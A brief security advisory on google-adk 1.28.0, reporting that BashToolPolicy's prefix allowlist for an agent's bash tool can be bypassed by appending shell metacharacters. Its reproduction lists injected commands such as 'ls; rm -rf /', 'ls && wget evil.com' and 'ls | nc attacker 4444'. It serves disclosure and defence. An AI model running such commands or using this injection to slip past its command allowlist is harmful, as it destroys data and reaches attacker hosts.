LOW SEVERITYCONFIRMED
BashToolPolicy prefix validation bypassable via shell metacharacters
Package
google-adk
Version
1.28.0
Verified
2026-03-28
Description
google-adk's `BashToolPolicy._validate_command` allows only commands that start with a configured prefix (e.g., `'ls'`), but performs no shell metacharacter parsing. Commands like `ls; rm -rf /`, `ls && wget evil.com`, and `ls | nc attacker 4444` all pass the prefix check. The policy creates a false sense of security; arbitrary shell code can be appended after any allowed prefix.
Reproduction
# BashToolPolicy(allowed_command_prefixes=('ls',)) passes all of:
# 'ls; rm -rf /' -> None (allowed)
# 'ls && wget evil.com' -> None (allowed)
# 'ls | nc attacker 4444' -> None (allowed)
# Mitigation: run_async() always calls request_confirmation(), but policy is misleading